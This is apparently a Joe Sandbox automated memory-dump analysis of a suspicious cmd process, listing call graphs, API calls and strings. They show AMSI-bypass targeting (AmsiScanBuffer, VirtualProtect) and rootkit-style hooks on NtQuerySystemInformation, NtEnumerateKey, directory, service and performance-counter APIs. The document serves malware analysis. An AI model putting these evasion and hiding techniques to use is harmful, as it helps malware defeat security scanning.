253fc40df38 GetModuleFileNameW 16636->16658 16637->16657 16644 253fc40bc7a 16647 253fc40b994 14 API calls 16644->16647 16645 253fc40bc69 16646 253fc40d1f4 __std_exception_copy 13 API calls 16645->16646 16648 253fc40bc6e 16646->16648 16649 253fc40bc96 16647->16649 16650 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16648->16650 16649->16648 16651 253fc40bcc6 16649->16651 16652 253fc40bcdf 16649->16652 16650->16657 16653 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16651->16653 16655 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16652->16655 16654 253fc40bccf 16653->16654 16656 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16654->16656 16655->16648 16656->16657 16657->16627 16659 253fc40df7d GetLastError 16658->16659 16660 253fc40df91 16658->16660 16682 253fc40d184 16659->16682 16662 253fc40dd78 14 API calls 16660->16662 16663 253fc40dfbf 16662->16663 16664 253fc40dfd0 16663->16664 16687 253fc40f198 16663->16687 16691 253fc40de1c 16664->16691 16666 253fc408070 _invalid_parameter_noinfo 8 API calls 16667 253fc40bc0e 16666->16667 16670 253fc40b994 16667->16670 16669 253fc40df8a 16669->16666 16671 253fc40b9d2 16670->16671 16674 253fc40ba38 16671->16674 16708 253fc40ec1c 16671->16708 16673 253fc40bb25 16676 253fc40bb54 16673->16676 16674->16673 16675 253fc40ec1c 14 API calls 16674->16675 16675->16674 16677 253fc40bb6c 16676->16677 16681 253fc40bba4 16676->16681 16678 253fc40d220 _invalid_parameter_noinfo 13 API calls 16677->16678 16677->16681 16679 253fc40bb9a 16678->16679 16680 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16679->16680 16680->16681 16681->16644 16681->16645 16705 253fc40d1d0 16682->16705 16684 253fc40d191 Concurrency::details::SchedulerProxy::DeleteThis 16685 253fc40d1f4 __std_exception_copy 13 API calls 16684->16685 16686 253fc40d1a1 16685->16686 16686->16669 16688 253fc40f1ca 16687->16688 16689 253fc40f1a9 
16687->16689 16688->16664 16689->16688 16690 253fc40ef88 9 API calls 16689->16690 16690->16688 16692 253fc40de5b 16691->16692 16700 253fc40de40 16691->16700 16693 253fc40ece8 WideCharToMultiByte 16692->16693 16699 253fc40de60 16692->16699 16694 253fc40deb7 16693->16694 16695 253fc40debe GetLastError 16694->16695 16698 253fc40dee9 16694->16698 16694->16699 16697 253fc40d184 13 API calls 16695->16697 16696 253fc40d1f4 __std_exception_copy 13 API calls 16696->16700 16701 253fc40decb 16697->16701 16702 253fc40ece8 WideCharToMultiByte 16698->16702 16699->16696 16699->16700 16700->16669 16703 253fc40d1f4 __std_exception_copy 13 API calls 16701->16703 16704 253fc40df10 16702->16704 16703->16700 16704->16695 16704->16700 16706 253fc40cb10 __std_exception_copy 13 API calls 16705->16706 16707 253fc40d1d9 16706->16707 16707->16684 16709 253fc40eba8 16708->16709 16710 253fc40dd78 14 API calls 16709->16710 16711 253fc40ebcc 16710->16711 16711->16671 18373 253fc4147c2 18374 253fc409978 __CxxCallCatchBlock 9 API calls 18373->18374 18377 253fc4147d5 18374->18377 18375 253fc414814 __CxxCallCatchBlock 18376 253fc409324 _CreateFrameInfo 9 API calls 18375->18376 18378 253fc414828 18376->18378 18377->18375 18381 253fc408ff8 __CxxCallCatchBlock 9 API calls 18377->18381 18379 253fc409324 _CreateFrameInfo 9 API calls 18378->18379 18380 253fc414838 18379->18380 18381->18375 14936 253fc401bc4 14943 253fc401724 GetProcessHeap HeapAlloc 14936->14943 14938 253fc401bd3 14939 253fc401bda SleepEx 14938->14939 14942 253fc40159c StrCmpIW StrCmpW 14938->14942 14994 253fc4019b0 14938->14994 14940 253fc401724 50 API calls 14939->14940 14940->14938 14942->14938 15011 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14943->15011 14945 253fc40174c 15012 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14945->15012 14947 253fc401754 15013 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14947->15013 14949 253fc40175d 15014 253fc401264 GetProcessHeap HeapAlloc 
GetProcessHeap HeapAlloc 14949->15014 14951 253fc401766 15015 253fc401264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14951->15015 14953 253fc40176f 15016 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14953->15016 14955 253fc401778 15017 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14955->15017 14957 253fc401781 15018 253fc401000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14957->15018 14959 253fc40178a RegOpenKeyExW 14960 253fc4017bc RegOpenKeyExW 14959->14960 14961 253fc4019a2 14959->14961 14962 253fc4017e5 14960->14962 14963 253fc4017fb RegOpenKeyExW 14960->14963 14961->14938 15019 253fc4012b8 RegQueryInfoKeyW 14962->15019 14965 253fc401836 RegOpenKeyExW 14963->14965 14966 253fc40181f 14963->14966 14969 253fc40185a 14965->14969 14970 253fc401871 RegOpenKeyExW 14965->14970 15028 253fc40104c RegQueryInfoKeyW 14966->15028 14972 253fc4012b8 16 API calls 14969->14972 14973 253fc401895 14970->14973 14974 253fc4018ac RegOpenKeyExW 14970->14974 14978 253fc401867 RegCloseKey 14972->14978 14975 253fc4012b8 16 API calls 14973->14975 14976 253fc4018e7 RegOpenKeyExW 14974->14976 14977 253fc4018d0 14974->14977 14979 253fc4018a2 RegCloseKey 14975->14979 14981 253fc40190b 14976->14981 14982 253fc401922 RegOpenKeyExW 14976->14982 14980 253fc4012b8 16 API calls 14977->14980 14978->14970 14979->14974 14983 253fc4018dd RegCloseKey 14980->14983 14984 253fc40104c 6 API calls 14981->14984 14985 253fc401946 14982->14985 14986 253fc40195d RegOpenKeyExW 14982->14986 14983->14976 14987 253fc401918 RegCloseKey 14984->14987 14988 253fc40104c 6 API calls 14985->14988 14989 253fc401998 RegCloseKey 14986->14989 14990 253fc401981 14986->14990 14987->14982 14992 253fc401953 RegCloseKey 14988->14992 14989->14961 14991 253fc40104c 6 API calls 14990->14991 14993 253fc40198e RegCloseKey 14991->14993 14992->14986 14993->14989 15038 253fc4014a0 14994->15038 15011->14945 15012->14947 15013->14949 15014->14951 15015->14953 15016->14955 15017->14957 
15018->14959 15020 253fc401323 GetProcessHeap HeapAlloc 15019->15020 15021 253fc401486 RegCloseKey 15019->15021 15022 253fc40134e RegEnumValueW 15020->15022 15023 253fc401472 GetProcessHeap HeapFree 15020->15023 15021->14963 15024 253fc4013a1 15022->15024 15023->15021 15024->15022 15024->15023 15026 253fc40141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15024->15026 15027 253fc4013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15024->15027 15033 253fc401530 15024->15033 15026->15024 15027->15026 15029 253fc4011b5 RegCloseKey 15028->15029 15031 253fc4010bf 15028->15031 15029->14965 15030 253fc4010cf RegEnumValueW 15030->15031 15031->15029 15031->15030 15032 253fc40114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15031->15032 15032->15031 15034 253fc40154a 15033->15034 15037 253fc401580 15033->15037 15035 253fc401569 StrCmpW 15034->15035 15036 253fc401561 StrCmpIW 15034->15036 15034->15037 15035->15034 15036->15034 15037->15024 15039 253fc4014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15038->15039 15040 253fc4014c2 GetProcessHeap HeapFree 15038->15040 15040->15039 15040->15040 18382 253fc431bc4 18389 253fc431724 GetProcessHeap HeapAlloc 18382->18389 18384 253fc431bda Sleep 18385 253fc431724 50 API calls 18384->18385 18387 253fc431bd3 18385->18387 18387->18384 18388 253fc43159c StrCmpIW StrCmpW 18387->18388 18440 253fc4319b0 18387->18440 18388->18387 18457 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18389->18457 18391 253fc43174c 18458 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18391->18458 18393 253fc431754 18459 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18393->18459 18395 253fc43175d 18460 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18395->18460 18397 253fc431766 18461 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18397->18461 18399 253fc43176f 18462 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18399->18462 18401 253fc431778 18463 253fc431000 
GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18401->18463 18403 253fc431781 18464 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18403->18464 18405 253fc43178a RegOpenKeyExW 18406 253fc4317bc RegOpenKeyExW 18405->18406 18407 253fc4319a2 18405->18407 18408 253fc4317e5 18406->18408 18409 253fc4317fb RegOpenKeyExW 18406->18409 18407->18387 18465 253fc4312b8 RegQueryInfoKeyW 18408->18465 18411 253fc431836 RegOpenKeyExW 18409->18411 18412 253fc43181f 18409->18412 18415 253fc43185a 18411->18415 18416 253fc431871 RegOpenKeyExW 18411->18416 18474 253fc43104c RegQueryInfoKeyW 18412->18474 18420 253fc4312b8 16 API calls 18415->18420 18417 253fc431895 18416->18417 18418 253fc4318ac RegOpenKeyExW 18416->18418 18422 253fc4312b8 16 API calls 18417->18422 18423 253fc4318e7 RegOpenKeyExW 18418->18423 18424 253fc4318d0 18418->18424 18421 253fc431867 RegCloseKey 18420->18421 18421->18416 18425 253fc4318a2 RegCloseKey 18422->18425 18427 253fc43190b 18423->18427 18428 253fc431922 RegOpenKeyExW 18423->18428 18426 253fc4312b8 16 API calls 18424->18426 18425->18418 18429 253fc4318dd RegCloseKey 18426->18429 18430 253fc43104c 6 API calls 18427->18430 18431 253fc431946 18428->18431 18432 253fc43195d RegOpenKeyExW 18428->18432 18429->18423 18435 253fc431918 RegCloseKey 18430->18435 18436 253fc43104c 6 API calls 18431->18436 18433 253fc431998 RegCloseKey 18432->18433 18434 253fc431981 18432->18434 18433->18407 18438 253fc43104c 6 API calls 18434->18438 18435->18428 18437 253fc431953 RegCloseKey 18436->18437 18437->18432 18439 253fc43198e RegCloseKey 18438->18439 18439->18433 18479 253fc4314a0 18440->18479 18457->18391 18458->18393 18459->18395 18460->18397 18461->18399 18462->18401 18463->18403 18464->18405 18466 253fc431486 RegCloseKey 18465->18466 18467 253fc431323 GetProcessHeap HeapAlloc 18465->18467 18466->18409 18468 253fc43134e RegEnumValueW 18467->18468 18469 253fc431472 GetProcessHeap HeapFree 18467->18469 18470 253fc4313a1 18468->18470 18469->18466 18470->18468 
18470->18469 18471 253fc431530 2 API calls 18470->18471 18472 253fc43141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 18470->18472 18473 253fc4313cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 18470->18473 18471->18470 18472->18470 18473->18472 18475 253fc4311b5 RegCloseKey 18474->18475 18476 253fc4310bf 18474->18476 18475->18411 18476->18475 18477 253fc4310cf RegEnumValueW 18476->18477 18478 253fc43114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 18476->18478 18477->18476 18478->18476 18480 253fc4314e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 18479->18480 18481 253fc4314c2 GetProcessHeap HeapFree 18479->18481 18481->18480 18481->18481 18482 253fc405fcc 18483 253fc405fd3 18482->18483 18484 253fc405f10 18483->18484 18485 253fc406000 VirtualProtect 18483->18485 18485->18484 18486 253fc406029 GetLastError 18485->18486 18486->18484 16802 253fc4119d0 16803 253fc40e864 56 API calls 16802->16803 16804 253fc4119d9 16803->16804 15877 253fc40b0d4 15884 253fc40b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 15877->15884 15878 253fc40b0fb 15879 253fc409324 _CreateFrameInfo 9 API calls 15878->15879 15880 253fc40b100 15879->15880 15881 253fc409324 _CreateFrameInfo 9 API calls 15880->15881 15883 253fc40b10b __FrameHandler3::GetHandlerSearchState 15880->15883 15881->15883 15882 253fc4099cc 9 API calls Is_bad_exception_allowed 15882->15884 15884->15878 15884->15882 15884->15883 15886 253fc4099f4 15884->15886 15887 253fc409324 _CreateFrameInfo 9 API calls 15886->15887 15888 253fc409a02 15887->15888 15888->15884 16809 253fc40c1d8 16810 253fc40c209 16809->16810 16811 253fc40c1f1 16809->16811 16811->16810 16812 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16811->16812 16812->16810 17732 253fc40f6dc 17733 253fc40f6e8 17732->17733 17735 253fc40f70f 17733->17735 17736 253fc411c0c 17733->17736 17737 253fc411c11 17736->17737 17741 253fc411c4c 17736->17741 17738 253fc411c44 17737->17738 17739 253fc411c32 DeleteCriticalSection 
17737->17739 17740 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17738->17740 17739->17738 17739->17739 17740->17741 17741->17733 16813 253fc4025dc 16815 253fc40265a 16813->16815 16814 253fc402777 16815->16814 16816 253fc4026bf GetFileType 16815->16816 16817 253fc4026cd StrCpyW 16816->16817 16818 253fc4026e1 16816->16818 16822 253fc4026ee 16817->16822 16824 253fc401ad4 GetFinalPathNameByHandleW 16818->16824 16820 253fc403f88 StrCmpNIW 16820->16822 16822->16814 16822->16820 16829 253fc403708 StrCmpIW 16822->16829 16833 253fc401dd4 16822->16833 16825 253fc401b3d 16824->16825 16826 253fc401afe StrCmpNIW 16824->16826 16825->16822 16826->16825 16827 253fc401b18 lstrlenW 16826->16827 16827->16825 16828 253fc401b2a StrCpyW 16827->16828 16828->16825 16830 253fc40373a StrCpyW StrCatW 16829->16830 16831 253fc403751 PathCombineW 16829->16831 16832 253fc40375a 16830->16832 16831->16832 16832->16822 16834 253fc401deb 16833->16834 16835 253fc401df4 16833->16835 16836 253fc401530 2 API calls 16834->16836 16835->16822 16836->16835 17748 253fc4106e0 17749 253fc4106e9 17748->17749 17753 253fc4106f9 17748->17753 17750 253fc40d1f4 __std_exception_copy 13 API calls 17749->17750 17751 253fc4106ee 17750->17751 17752 253fc40d04c _invalid_parameter_noinfo 38 API calls 17751->17752 17752->17753 18492 253fc4063e3 18493 253fc4063f0 18492->18493 18494 253fc4063fc GetThreadContext 18493->18494 18499 253fc40655a 18493->18499 18495 253fc406422 18494->18495 18494->18499 18495->18499 18501 253fc406449 18495->18501 18496 253fc40663e 18498 253fc40665e 18496->18498 18503 253fc404b20 VirtualFree 18496->18503 18497 253fc406581 VirtualProtect FlushInstructionCache 18497->18499 18500 253fc405530 3 API calls 18498->18500 18499->18496 18499->18497 18507 253fc406663 18500->18507 18502 253fc4064cd 18501->18502 18504 253fc4064a6 SetThreadContext 18501->18504 18503->18498 18504->18502 18505 253fc4066b7 18508 253fc408070 _invalid_parameter_noinfo 8 API calls 18505->18508 18506 
253fc406677 ResumeThread 18506->18507 18507->18505 18507->18506 18509 253fc4066ff 18508->18509 18510 253fc40f3e4 18511 253fc40f41d 18510->18511 18512 253fc40f3ee 18510->18512 18512->18511 18513 253fc40f403 FreeLibrary 18512->18513 18513->18512 18514 253fc4133e4 18515 253fc4133f5 CloseHandle 18514->18515 18516 253fc4133fb 18514->18516 18515->18516 18565 253fc4027e8 18566 253fc402867 18565->18566 18567 253fc4028c9 GetFileType 18566->18567 18579 253fc402998 18566->18579 18568 253fc4028d7 StrCpyW 18567->18568 18569 253fc4028ed 18567->18569 18570 253fc4028fc 18568->18570 18571 253fc401ad4 4 API calls 18569->18571 18572 253fc402906 18570->18572 18573 253fc40299d 18570->18573 18571->18570 18575 253fc403f88 StrCmpNIW 18572->18575 18578 253fc403708 4 API calls 18572->18578 18572->18579 18580 253fc401dd4 2 API calls 18572->18580 18574 253fc403f88 StrCmpNIW 18573->18574 18576 253fc403708 4 API calls 18573->18576 18577 253fc401dd4 2 API calls 18573->18577 18573->18579 18574->18573 18575->18572 18576->18573 18577->18573 18578->18572 18580->18572 18604 253fc40b7ea 18605 253fc40c2f4 14 API calls 18604->18605 18606 253fc40b7ef 18605->18606 18607 253fc40b815 GetModuleHandleW 18606->18607 18608 253fc40b85f 18606->18608 18607->18608 18612 253fc40b822 18607->18612 18621 253fc40b6f8 18608->18621 18612->18608 18616 253fc40b904 GetModuleHandleExW 18612->18616 18617 253fc40b938 GetProcAddress 18616->18617 18618 253fc40b94a 18616->18618 18617->18618 18619 253fc40b95b FreeLibrary 18618->18619 18620 253fc40b962 18618->18620 18619->18620 18620->18608 18633 253fc40c558 EnterCriticalSection 18621->18633 15901 253fc40acec 15904 253fc4090c0 15901->15904 15903 253fc40ad15 15905 253fc409116 15904->15905 15906 253fc4090e1 15904->15906 15905->15903 15906->15905 15908 253fc40c328 15906->15908 15909 253fc40c335 15908->15909 15910 253fc40c33f 15908->15910 15909->15910 15915 253fc40c35a 15909->15915 15911 253fc40d1f4 __std_exception_copy 13 API calls 15910->15911 15912 253fc40c346 15911->15912 15914 

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 532c2657adfb75e6c0280d5284af03685f5cb43d16fbdfb69c32e6aee7c8344c
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 87D01230ED9D08C5E90BEB16EC5C35422616B54BC3FD02014C14E01A70EE3C4B788748

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: c667fe879837e9b6c370277d5f3ffd56394cf4864c0bd450d85018cb482f4e7e
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: BF51B074DD8E0EA5EA13DFAAEC4D7D42B20A7403D6F802417944952DB1EE3C8B7AC748

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 00000253FC403A35
                                            • PathFindFileNameW.SHLWAPI ref: 00000253FC403A44
                                              • Part of subcall function 00000253FC403F88: StrCmpNIW.SHLWAPI(?,?,?,00000253FC40272F), ref: 00000253FC403FA0
                                              • Part of subcall function 00000253FC403EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403EDB
                                              • Part of subcall function 00000253FC403EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F0E
                                              • Part of subcall function 00000253FC403EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F2E
                                              • Part of subcall function 00000253FC403EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F47
                                              • Part of subcall function 00000253FC403EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F68
                                            • CreateThread.KERNELBASE ref: 00000253FC403A8B
                                              • Part of subcall function 00000253FC401E74: GetCurrentThread.KERNEL32 ref: 00000253FC401E7F
                                              • Part of subcall function 00000253FC401E74: CreateThread.KERNELBASE ref: 00000253FC402043
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402049
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402055
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402061
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC40206D
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402079
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402085
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 1ce5ab6cdca28133087365578e00b0f2979cc71bebb00936f5facb8f86157c1c
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: E2118035EECE4981FB62D761AD4E3992AA0A7D43D7F502125984681DF0DF3CC7748A08

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: 6076a54b53c7bd1763d0156bef8b29927040315e7ae70683910fd1cc31de5a8a
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: 2D31B132ADCF4881EB62CB1599883692650F345BF1F682719DB6A477F0CB34D9B2C308

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: d4b8e497b3c9be9d59337c6abda652c8580fbfb386a3454678d592ce3d51d65e
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: 5631A232F58F4891EB61CB1499882692A50F385BF1FA82359DB6A077F0CB35D5B2E344
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: cc572ed6fb3ce52298dfa9e0e2379d11894853fc5e67205f38fef5a9beabbd84
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 3A9167B2F4595D87DB90DF65D81876DB3A1F780BD6F0490229E0A07B88DA3CDE12C348

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00000253FC401724: GetProcessHeap.KERNEL32 ref: 00000253FC40172F
                                              • Part of subcall function 00000253FC401724: HeapAlloc.KERNEL32 ref: 00000253FC40173E
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC4017AE
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC4017DB
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC4017F5
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401815
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC401830
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401850
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC40186B
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC40188B
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC4018A6
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC4018C6
                                            • SleepEx.KERNELBASE ref: 00000253FC401BDF
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC4018E1
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401901
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC40191C
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC40193C
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC401957
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401977
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC401992
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC40199C
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
